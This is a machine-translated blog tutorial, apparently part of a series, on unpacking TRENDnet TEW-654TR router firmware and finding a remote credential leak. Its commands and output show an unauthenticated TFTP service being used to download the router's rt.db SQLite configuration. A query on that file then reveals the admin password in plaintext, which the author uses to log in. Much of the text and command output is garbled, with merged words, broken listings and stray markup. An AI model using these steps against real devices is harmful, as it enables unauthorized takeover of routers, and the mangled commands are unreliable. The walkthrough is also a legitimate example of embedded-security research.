The various tools for unpacking router firmware are described in detail in the previous article. After unpacking, the files in the firmware are obtained. The next step is to analyze the file for leaks. The objective of this analysis is to trendnet routers, the vulnerability of which is a remote access to router permissions.
Preliminary analysis
Through the router's login interface to learn that the router model is TRENDnet TEW-654TR, which is useful to gather information about the target. Learn about some of the features of the router through an official introduction. Includes support for routers, wireless access points, three modes of wireless access point clients, support for NAT and stateful packet check defense attacks, and a simple web interface to support remote management. The latest version of the current firmware is v1.10b26. The firmware version analyzed in this article is V1.10B12 and can be downloaded from here. In order to facilitate the use of tools such as file does not have information collection. Using Binwalk to view bin file information directly, you can see that it is a more standard Linux-based file system.
Use firmware Mod Kit to automatically unpack successfully:
The first thing to do after unpacking succeeds is to look at the ETC directory configuration file and the startup script.
etc git: (master)? LS-Altotal +drwxrwxrwx7Root Wheel238 5 - .. drwxrwxrwx -Root Wheel578 5 - . ..-rwxrwxrwx1Root Wheel the One Ten -Fstab-rwxr-xr-x1Root Wheel3774 5 - .Icon.ico-rwxrwxrwx1Root Wheel109 One Ten -Inittabdrwxrwxrwx3Root Wheel102 3 at .rc.dlrwxrwxrwx1Root Wheel A 8 - +:Panax Notoginsengresolv.conf. /var/etc/resolv.conf
No valuable configuration files were found, but there is a startup script called RCS under the RC.D directory.
? etc git: (master)? CD RC.D? RC.D git: (Master)? Ls-altotal 8drwxrwxrwx 3 root wheel 102 3 2010 . drwxrwxrwx 7 root wheel 238 530 .. -rwxrwxrwx 1 root wheel 768 3 2010 RcS
RCS usually initializes the service and environment at startup, so it's worth a closer look.
? RC.D git: (Master)? Cat rcs#!/bin/ash# This script runs when init it run during the boot process.# Mounts everything in the Fstabmount-amount-o remount +w/# Mount The RAM filesystem to/tmpmount-t tmpfs tmpfs/tmp# copy all fil Es in the Mnt folder to the ETC foldercp-a/mnt/*
/etcmkdir-p/var/etcmkdir-p/var/firmmkdir-p/var/logmkdir-p/var/miscmkdir-p/V Ar/runmkdir-p/var/sbinmkdir-p/var/tmpmkdir-p/tmp/varcp-f/etc/udhcpd.conf/var/etc/cp-f/etc/udhcpd.leases/var/mi sc/#Add link for resolv.conf#ln-sf/var/etc/resolv.conf/etc/resolv.conf# Load configure file from Flash/bin/echo "Init S Ystem ... "System_manager start Tftpd/bin/echo" Start tftpd ... " TFTPD & #insert Cc_dev module for reset packet Counterinsmod/lib/modules/cc_dev.ko
The script is simple, set up some directories, then launch the System_manager and TFTP, and finally load a kernel module. Let's take a look at TFTP first.
[Email protected]:/opt/firmware-mod-kit/trunk/fmk/rootfs$ Find-name TFTPD. /sbin/tftpd[email protected]:/opt/firmware-mod-kit/trunk/fmk/rootfs$ file./sbin/tftpd. + 1 (SYSV), dynamically linked (uses shared libs), Stripped[email protected]:/opt/firmware-mod-kit/trunk/fmk/ rootfs$ strings./sbin//lib/ld-uclibc.so.0p, D_init_fini__uclibc_main ... .
Through the function name and some strings, it feels like a TFTP server that can be connected directly. Try connecting for a moment.
[Email protected]:~$ tftp1.1.1.102TFTP>Get/var/etc/udhcpd.confreceived615bytesinch 0.0secondstftp>Quit[email protected]:~$ cat udhcpd.conf # Sample UDHCPD configuration file (/etc/udhcpd.conf) # The location of the leases Filelease_file/var/misc/udhcpd.leases# the location of the PID Filepidfile/var/run/udhcpd.pid# Everytime UDHCPD writes a leases file, the below script would be called.# useful forWriting the lease file to flash every few hours.notify_file dumpleases # <---useful fordebugging# The following settings is added by System_managerinterface br0opt router192.168.Ten.1option Subnet255.255.255. 0option Domain Start192.168.Ten.101end192.168.Ten.199option Lease 604800static_leasexx: -:d 1:b6: Geneva: the 192.168.10.1
Find sensitive information
The TFTP service is found to be running and can be connected directly. The next step is to find out where sensitive information is stored. You can tell by the comments in the RCS file that the System_manager program can load the configuration file from Flash. If System_manager writes the configuration file to a temporary directory or virtual memory disk, then we can download the configuration file directly. Look for the file path used in System_manager:
[email protected]:/opt/firmware-mod-kit/trunk/fmk/rootfs$ strings./usr/bin/system_manager | grep &#< Span style= "color: #800080;" >039 ;/' ;/lib/ld-uclibc.so. 0 /etc/rt.db /etc/default_ap.db /etc/ap.db /etc/default_apc.db /etc/apc.dbln -sf/var /etc/resolv.conf/etc/ resolv.conf /etc/scripts/config-vlan.sh
DB suffix several files caught my attention, each file has a filename added to the default backup file. Almost all routers have the ability to restore the default configuration, so they will definitely have a default configuration somewhere. If these DB files are the router's configuration file, it's a bit of a word. But which file stores information such as sensitive passwords? Of course you can download all three to see. When I think about the first time I looked at the product information, we said that this router supports 3 modes: route,access point,access point client. The 3 db here looks exactly like the three-mode configuration. Since we are testing this goal to open the remote Web management, should be the route mode, so first download rt.db look.
1.1. 1.102 TFTP Get 49152 inch 0.1 secondstftp> [email protected]:~3. x database
SQLite database. Look at the data inside.
[Email protected]:~$ sqlite3 rt.dbsqlite version3.6.22Enter". Help" forInstructionsenter SQL statements terminated with a";"Sqlite>. Tablesadvanced_network Restore_default wan_static daylight_saving smtp_settings We Bsite_filter db_version special_application website_filter_mode dhcp_server static_routing wireless_advanced DMZ syslog wireless_basic dynamic_dns time Wireless_filter dynamic_routing User Wireless_filter_modeip_filter Virtua L_Server wireless_security lan_settings wan_dhcp wireless_wps log_setting WAN_L2TP wizard_setting message Wan_pppoe wpa_settings nat_filter WAN_PPTP remote_management wan_settings SQLite>. Schema Usercreate TABLE"User"("user_name"VARCHAR DEFAULT039;039;,"user_pwd"VARCHAR DEFAULT039;039;," Level"CHAR DEFAULT039;039;); SQLite>Select* fromUser;admin|asecretpassword|1user|asecretpassword|0sqlite>
The login password can be queried directly. Successfully logged in using the password in the database.
With some simple analysis, we found a remotely exploited vulnerability. Welcome to the world of embedded security ~ Of course this loophole looks a bit lame. The next article will continue some of the more interesting loopholes.
In the latest version of the firmware, the manufacturer directly disables the power-on-boot TFTP function to solve this problem.
from Flash " Init System ... "System_manager &# start tftpd#"start tftpd ... "#tftpd &for/lib/modules/cc_dev.ko
Sensitive information leakage Part2 of reverse router firmware